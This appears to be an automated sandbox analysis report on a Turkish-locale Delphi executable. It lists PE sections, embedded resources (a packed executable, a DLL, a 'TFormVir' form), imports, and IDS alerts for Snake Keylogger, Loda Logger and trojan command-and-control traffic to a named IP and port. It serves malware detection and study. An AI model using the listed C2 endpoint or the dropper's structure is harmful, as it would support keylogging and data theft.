                                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                                      mov edx, 0049ABE0h
                                                                                                                                                      call 00007F04C4CBF104h
                                                                                                                                                      mov ecx, dword ptr [0049DBDCh]
                                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                                      mov edx, dword ptr [00496590h]
                                                                                                                                                      call 00007F04C4CBF4F4h
                                                                                                                                                      mov eax, dword ptr [0049DBCCh]
                                                                                                                                                      mov eax, dword ptr [eax]
                                                                                                                                                      call 00007F04C4CBF568h
                                                                                                                                                      call 00007F04C4C6969Bh
                                                                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x13b130 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0x13b130 | 0x13b200 | 83c0f5a87bc51105ad0d711ed6e2629b | False | 0.6873380788873463 | data | 6.883262483410263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635
RT_CURSOR | 0xb0efc | 0x134 | data | | | 0.4642857142857143
RT_CURSOR | 0xb1030 | 0x134 | data | | | 0.4805194805194805
RT_CURSOR | 0xb1164 | 0x134 | data | | | 0.38311688311688313
RT_CURSOR | 0xb1298 | 0x134 | data | | | 0.36038961038961037
RT_CURSOR | 0xb13cc | 0x134 | data | | | 0.4090909090909091
RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468
RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125
RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066
RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414
RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414
RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931
RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793
RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896
RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105
RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414
RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.12171669793621014
RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516
RT_DIALOG | 0xb4aa0 | 0x52 | data | | | 0.7682926829268293
RT_STRING | 0xb4af4 | 0x358 | data | | | 0.3796728971962617
RT_STRING | 0xb4e4c | 0x428 | data | | | 0.37406015037593987
RT_STRING | 0xb5274 | 0x3a4 | data | | | 0.40879828326180256
RT_STRING | 0xb5618 | 0x3bc | data | | | 0.33472803347280333
RT_STRING | 0xb59d4 | 0x2d4 | data | | | 0.4654696132596685
RT_STRING | 0xb5ca8 | 0x334 | data | | | 0.42804878048780487
RT_STRING | 0xb5fdc | 0x42c | data | | | 0.42602996254681647
RT_STRING | 0xb6408 | 0x1f0 | data | | | 0.4213709677419355
RT_STRING | 0xb65f8 | 0x1c0 | data | | | 0.44419642857142855
RT_STRING | 0xb67b8 | 0xdc | data | | | 0.6
RT_STRING | 0xb6894 | 0x320 | data | | | 0.45125
RT_STRING | 0xb6bb4 | 0xd8 | data | | | 0.5879629629629629
RT_STRING | 0xb6c8c | 0x118 | data | | | 0.5678571428571428
RT_STRING | 0xb6da4 | 0x268 | data | | | 0.4707792207792208
RT_STRING | 0xb700c | 0x3f8 | data | | | 0.37598425196850394
RT_STRING | 0xb7404 | 0x378 | data | | | 0.41103603603603606
RT_STRING | 0xb777c | 0x380 | data | | | 0.35379464285714285
RT_STRING | 0xb7afc | 0x374 | data | | | 0.4061085972850679
RT_STRING | 0xb7e70 | 0xe0 | data | | | 0.5535714285714286
RT_STRING | 0xb7f50 | 0xbc | data | | | 0.526595744680851
RT_STRING | 0xb800c | 0x368 | data | | | 0.40940366972477066
RT_STRING | 0xb8374 | 0x3fc | data | | | 0.34901960784313724
RT_STRING | 0xb8770 | 0x2fc | data | | | 0.36649214659685864
RT_STRING | 0xb8a6c | 0x354 | data | | | 0.31572769953051644
RT_RCDATA | 0xb8dc0 | 0x44 | data | | | 0.8676470588235294
RT_RCDATA | 0xb8e04 | 0x10 | data | | | 1.5
RT_RCDATA | 0xb8e14 | 0x129400 | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed | | | 0.6519241333007812
RT_RCDATA | 0x1e2214 | 0x3 | ASCII text, with no line terminators | Turkish | Turkey | 3.6666666666666665
RT_RCDATA | 0x1e2218 | 0x3c00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | Turkish | Turkey | 0.54296875
RT_RCDATA | 0x1e5e18 | 0x64c | data | | | 0.5998759305210918
RT_RCDATA | 0x1e6464 | 0x153 | Delphi compiled form 'TFormVir' | | | 0.7522123893805309
RT_RCDATA | 0x1e65b8 | 0x47d3 | Microsoft Excel 2007+ | Turkish | Turkey | 0.8675150921846957
RT_GROUP_CURSOR | 0x1ead8c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x1eada0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25
RT_GROUP_CURSOR | 0x1eadb4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x1eadc8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x1eaddc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x1eadf0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_CURSOR | 0x1eae04 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3
RT_GROUP_ICON | 0x1eae18 | 0x14 | data | Turkish | Turkey | 1.1
RT_VERSION | 0x1eae2c | 0x304 | data | Turkish | Turkey | 0.42875647668393785
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll | GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll | RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll | lstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll | CLSIDFromString
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll | CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll | GetErrorInfo, SysFreeString
comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll | ShellExecuteExA, ExtractIconExW
wininet.dll | InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
shell32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
advapi32.dll | OpenSCManagerA, CloseServiceHandle
wsock32.dll | WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll | Netbios
Language of compilation system | Country where language is spoken
Turkish | Turkey
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50136 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 49797 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50144 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 49903 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50009 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50149 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50148 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50141 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50150 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50102 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50151 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50147 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:14.879330+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50140 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:29.697550+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49762 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:29.711379+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49761 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:30.160355+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.11 | 49769 | 69.42.215.252 | 80 | TCP
2024-12-30T11:25:30.983358+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49775 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:30.991855+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49776 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:31.580437+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.11 | 49797 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:31.580437+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 49797 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:31.958178+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49787 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:32.070859+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49788 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:33.036472+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49799 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:33.052311+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49802 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:34.713134+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49825 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:34.723403+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49826 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:35.715047+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49839 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:35.842350+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49837 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:36.721748+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49845 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:36.816313+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49847 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:37.730917+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49857 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:37.830902+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49859 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:39.324642+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49878 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:39.326532+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49879 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:40.297532+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49892 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:40.309514+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49890 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:40.620474+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 49903 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:41.331630+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.11 | 49900 | 172.217.18.110 | 443 | TCP
2024-12-30T11:25:49.754340+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50009 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:25:58.794699+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50102 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:07.839451+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.11 | 50136 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:07.839451+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50136 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:16.936177+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50140 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:25.963712+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50141 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:34.979812+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50144 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:44.005613+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50147 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:53.026577+0100 | 2822116 | ETPRO MALWARE Loda Logger CnC Beacon | 1 | 192.168.2.11 | 50148 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:26:53.026577+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50148 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:27:02.074137+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50149 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:27:11.135835+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50150 | 172.111.138.100 | 5552 | TCP
2024-12-30T11:27:20.198693+0100 | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 1 | 192.168.2.11 | 50151 | 172.111.138.100 | 5552 | TCP
                                                                                                                                                      Dec 30, 2024 11:25:30.668152094 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.668163061 CET44349778142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.668399096 CET44349778142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.668447971 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.669073105 CET49778443192.168.2.11142.250.181.225
                                                                                                                                                      Dec 30, 2024 11:25:30.691334009 CET44349777142.250.181.225192.168.2.11
                                                                                                                                                      Dec 30, 2024 11:25:30.711335897 CET44349778142.250.181.225192.168.2.11
